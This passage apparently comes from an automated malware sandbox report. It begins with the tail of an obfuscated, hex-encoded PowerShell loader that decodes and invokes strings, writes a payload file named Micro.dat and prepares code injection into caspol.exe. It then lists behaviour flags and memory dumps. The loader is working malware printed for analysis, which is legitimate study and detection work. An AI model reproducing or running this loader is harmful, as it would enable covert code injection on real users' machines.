Endpaper2211 '503C0118025449545C3A1103593B161E111700543A11005A23111637181D111A005D5A301B031A181B15102700061D1A135C50311A100415041106464644455D';$Journeycak8 = Endpaper2211 '5020061D171C46464D464950111A024E15040410150015';.($Overnou7) $Journeycak8;$Trich2292=$Trich2292+'\Micro.dat';$Hulv='';if (-not(Test-Path $Trich2292)) {while ($Hulv -eq '') {.($Overnou7) $Endpaper2200;Start-Sleep 5;}Set-Content $Trich2292 $Hulv;}$Hulv = Get-Content $Trich2292;$Journeycak9 = Endpaper2211 '503E1B01061A110D17151F5449542F270D070011195A371B1A02110600294E4E32061B193615071142402700061D1A135C503C0118025D';.($Overnou7) $Journeycak9;$Hulv0 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F5854445854545020061D171C46464D47585442414C5D';.($Overnou7) $Hulv0;$politiks=$Journeycak.count-658;$Hulv1 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F585442414C585450391517171B161B585450041B181D001D1F075D';.($Overnou7) $Hulv1;$Hulv2 = Endpaper2211 '50350718151A00031D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F151518001518545000111811121B1A1F5D58545C33302054345C2F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A00240006295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Hulv2;$Hulv3 = Endpaper2211 '50350718151A00031D5A3D1A021B1F115C5020061D171C46464D475850391517171B161B5850271F1D1A181D584458445D';.($Overnou7) $Hulv3#"3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1008
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1008-153-0x0000000000000000-mapping.dmp
-
memory/1008-160-0x0000000077CF0000-0x0000000077E93000-memory.dmpFilesize
1.6MB
-
memory/1008-159-0x00007FF93BAB0000-0x00007FF93BCA5000-memory.dmpFilesize
2.0MB
-
memory/1008-158-0x0000000000D20000-0x000000000202B000-memory.dmpFilesize
19.0MB
-
memory/1008-157-0x0000000077CF0000-0x0000000077E93000-memory.dmpFilesize
1.6MB
-
memory/1008-156-0x00007FF93BAB0000-0x00007FF93BCA5000-memory.dmpFilesize
2.0MB
-
memory/1008-155-0x0000000000D20000-0x000000000202B000-memory.dmpFilesize
19.0MB
-
memory/3068-132-0x0000000000000000-mapping.dmp
-
memory/4104-133-0x0000000000000000-mapping.dmp
-
memory/4356-139-0x0000000004F60000-0x0000000005588000-memory.dmpFilesize
6.2MB
-
memory/4356-150-0x0000000007CC0000-0x0000000008FCB000-memory.dmpFilesize
19.0MB
-
memory/4356-143-0x0000000005CE0000-0x0000000005CFE000-memory.dmpFilesize
120KB
-
memory/4356-144-0x0000000007640000-0x0000000007CBA000-memory.dmpFilesize
6.5MB
-
memory/4356-145-0x0000000006240000-0x000000000625A000-memory.dmpFilesize
104KB
-
memory/4356-146-0x0000000006FC0000-0x0000000007056000-memory.dmpFilesize
600KB
-
memory/4356-147-0x0000000006F10000-0x0000000006F32000-memory.dmpFilesize
136KB
-
memory/4356-148-0x0000000008FD0000-0x0000000009574000-memory.dmpFilesize
5.6MB
-
memory/4356-137-0x0000000000000000-mapping.dmp
-
memory/4356-142-0x0000000005600000-0x0000000005666000-memory.dmpFilesize
408KB
-
memory/4356-151-0x00007FF93BAB0000-0x00007FF93BCA5000-memory.dmpFilesize
2.0MB
-
memory/4356-152-0x0000000077CF0000-0x0000000077E93000-memory.dmpFilesize
1.6MB
-
memory/4356-141-0x0000000004EB0000-0x0000000004F16000-memory.dmpFilesize
408KB
-
memory/4356-154-0x0000000077CF0000-0x0000000077E93000-memory.dmpFilesize
1.6MB
-
memory/4356-140-0x0000000004E10000-0x0000000004E32000-memory.dmpFilesize
136KB
-
memory/4356-138-0x0000000004730000-0x0000000004766000-memory.dmpFilesize
216KB
-
memory/4600-149-0x00007FF91DE10000-0x00007FF91E8D1000-memory.dmpFilesize
10.8MB
-
memory/4600-136-0x00007FF91DE10000-0x00007FF91E8D1000-memory.dmpFilesize
10.8MB
-
memory/4600-135-0x00000198C0CC0000-0x00000198C0CE2000-memory.dmpFilesize
136KB
-
memory/4600-134-0x0000000000000000-mapping.dmp